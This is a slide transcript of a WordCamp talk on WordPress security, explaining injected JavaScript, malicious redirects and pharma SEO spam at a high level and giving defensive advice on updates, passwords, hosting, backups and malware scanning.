why my website sells viagra

Download Why My Website Sells Viagra

Post on 29-Jan-2015

107 views

Category:

Technology

0 download

Embed Size (px)

DESCRIPTION

WordPress End-User Security - WordCamp Atlanta - Dre Armeda, CISSP

TRANSCRIPT

  • 1.

2. DRE ARMEDA,CISSP @ DREMEDA

  • CO-FOUNDER AT SUCURI SECURITY
  • ORGANIZER, WORDCAMP SAN DIEGO
  • 12 YEAR NAVY VETERAN
  • 1 STWORDPRESS THEME IN 2005
  • LOVES TACOS
  • DIEHARD CHARGERS FAN
  • RIDES A HARLEY

SUCURI .NET DRE .IM 3. 4. THE WEB IS GROWING

  • Over 2 Billion internet users today. 480% growth in the last 11 years.(Internet World Stats)
  • 300 million websites were added to the internet in 2011(Pingdom)
  • 100,000+ domains gained weekly(Global Domain Registry)

5. INNOVATION & CREATIVITY 6. 7. 8. 9. 10. ITS NOT ALL PEACHY 11. 12. WHAT IS MALWARE?

  • SEO spam, JavaScript & iFrame attacks, and malicious redirects are a couple web-based malware examples.

Malware, short for malicious software, is a software designed to disrupt computer operation, gather sensitive information, or gain unauthorized access to computer systems. 13. 14. ATTACKERS LOVE YOU

  • Monitor your web browsing and internet usage
  • Forced advertising
  • Redirect affiliate marketing revenue

15. HOW BAD IS IT?

  • Over 2 million new malware strings monthly(McAfee)
  • Cost to US consumers alone = over $2.3 billion in 2010.(Consumer Reports)
  • Google Safe Browsing issues over 3 million malware warnings a day.(Google)

16. 17. ENCODED JAVASCRIPT Impact:Website pages may be used to serve malicious downloads to visitors. Downloads may be used to infect desktop computers, and/or exploit FTP info.Typical Entry Point:Outdated, known vulnerable software; exploited desktop computers; exploited FTP credentials. JavaScript that is obfuscated(hidden) so that you cant tell what it is. It is injected into files/pages on the site and used to serve malware. 18. ENCODED JAVASCRIPT /wp-admin/js/cat.js CLEAN 19. ENCODED JAVASCRIPT /wp-admin/js/cat.js INFECTED 20. ENCODED JAVASCRIPT /wp-admin/js/cat.js INFECTION DECODED Somewhat 21. ENCODED JAVASCRIPT

  • Attacker scans for known vulnerable software (Old WordPress installations, plugins, themes). Attack stems from exploited desktop which steals FTP information.
  • Backdoor file inserted into the environment. Thisgives the attacker remote access into your world
  • Payload inserted into various Javascript files and/or encoded and hidden in theme, plugin files.
  • Youve just enabled your visitors to load fake anti-virus and other cool downloads from your site

How it works: 22. ENCODED JAVASCRIPT

  • Encoded JavaScript Resources:
  • http://www.schillmania.com/content/entries/2009/javascript-malware-obfuscation- analysis
  • http://www.slideshare.net/yusufmotiwala/reverse-engineering-malicious- javascript
  • http://www.infosecisland.com/videos-view/19101-Malware-Analysis-How-to-Decode-JavaScript- Obfuscation.html

QUICK TIP:Check Google to see if youre infected -site:{yourdomain.com} viagra 23. CONDITIONAL REDIRECTS Impact:When traffic is coming from a specific referrer (i.e. Google, Bing), the site is redirected to a malicious website. Typical Entry Point:Outdated, known vulnerable software. An attack the causes a website to redirect to a malicious website based on referrer, web browser, operating system. 24. CONDITIONAL REDIRECTS Infected .htaccess file: 25. CONDITIONAL REDIRECTS Result of conditional redirect: 26. CONDITIONAL REDIRECTS

  • Attacker scans for known vulnerable software (Old WordPress installations, plugins, themes).
  • Backdoor file inserted into the environment. Thisgives the attacker remote access into your world
  • .htaccess file entries are created to load redirected. Encoded redirect code can also be added to index files.
  • Youre now redirecting to some cool malware awesomeness.

How it works: 27. CONDITIONAL REDIRECTS

  • Conditional Redirects Resources:
  • http://blog.sucuri.net/2011/11/the-new-and-old-htaccess-attacks-now-using-in- domains.html
  • http ://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess- malware.html
  • http://sucuri.net/malware-update-timthumb-php-and-htaccess-redirection.html

28. PHARMA HACK Impact:Website page and post titles, descriptions and links are changed to display pharmaceutical ads and links back to malicious websites on search engine result pages. Typical Entry Point:Outdated, known vulnerable software. Pharma Hack is a type of SEO poisoning. Attackers manipulate their search engine results to make their links appear higher than legitimate results. 29. PHARMA HACK Results of scanning rendered source.: 30. PHARMA HACK Google Search Engine Results: 31. PHARMA HACK

  • Attacker scans for known vulnerable software (Old WordPress installations, plugins, themes)
  • Backdoor file inserted into the environment. Thisgives the attacker remote access into your world
  • Control file is inserted into core application or plugin files. This file acts as a connection from the backdoor to the database.
  • Payload is dropped into the database and Viva Viagra!

How it works: QUICK TIP:Check Google to see if youre infected -site:{yourdomain.com} viagra 32. PHARMA HACK

  • Pharma Hack Resources:
  • http://blog.sucuri.net/2010/07/understanding-and-cleaning-the-pharma-hack-on- wordpress.html
  • http://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma- hack.html
  • http://www.pearsonified.com/2010/04/wordpress-pharma- hack.php
  • http://wpdude.com/refreshing-google-index-after-pharma- hack

QUICK TIP:Check Google to see if youre infected -site:{yourdomain.com} viagra 33. 34. WHAT IS SECURITY? PROTECTING THINGS OF VALUE FROM HARMS WAY. 35. HOW & WHY 36. AM I SECURE The percentage of risk can never be 0! The name of the game is minimizing risk. 37. 38. LOCAL MACHINE

  • Ensure your local machine stays updated
  • Use an Anti-Virus solution & enable auto-updates
    • Mac Sophos Anti-Virus for Mac Home Edition
    • Windows - AVG Anti-Virus Free
  • Dont store server credentials on your local machine

39. CONNECT TO YOUR SITE

  • Consider using sFTP or SSH instead of FTP.
  • If youre stuck with FTP:
      • Deny anonymous login
      • Limit connections
  • Practice least privilege
  • Dont store server credentials on your local machine

40. PASSWORDS

  • Change them often
  • Dont write them down, or share them
  • Passwords are like toothbrushes, you should keep them to yourself. And discard them, and get a new one, if they have been used by others.
  • Dont use the same password across all your accounts
  • Use a password manager
      • KeePass Password Safe
      • LastPass
      • 1Password

41. WHO HOSTS YOU?

  • CHEAP DOES NOT ALWAYS MEAN BEST, OR SAFEST!
  • DO YOUR RESEACH!
  • What software are they running? How often do they update?
  • How are server and support credentials stored & who has access? Are they 1 in the same?
  • What is their malware remediation process?
  • How many sites have been infected?
  • http://www.google.com/safebrowsing/diagnostic?site=google.com

42. GARAGE CLEANING

  • IF YOURE NOT USING IT, REMOVE IT!
  • UPDATE UPDATE UPDATE UPDATE UPDATE
  • Only load whats needed to get your job done.
  • Check your file and directory permissions.
  • Remove user accounts! Practice least privilege.
  • Have you changed your password lately?
  • UPDATE UPDATE UPDATE UPDATE UPDATE

43. 44. BACKUP YOUR WEBSITE

  • NO BACKUPS = BOOOOO!
  • BackupBuddy -http:// pluginbuddy.com/ backupbuddy /
  • VaultPress http://vaultpress.com

45. MALWARE SCAN

  • IS YOUR SITE INFECTED?
  • Unmask Parasites http://unmaskparasites.com
  • Sucuri SiteCheck http://sitecheck.sucuri.net

46. MALWARE CLEAN UP

  • IS YOUR SITE INFECTED?
  • VaultPress http://vaultpress.com
  • Sucuri Security http://sucuri.net

47. WORDPRESS PLUGINS

  • WordPress Exploit Scanner
  • BulletProof Security
  • Login Lockdown
  • Sucuri SiteCheck Malware Scanner

48.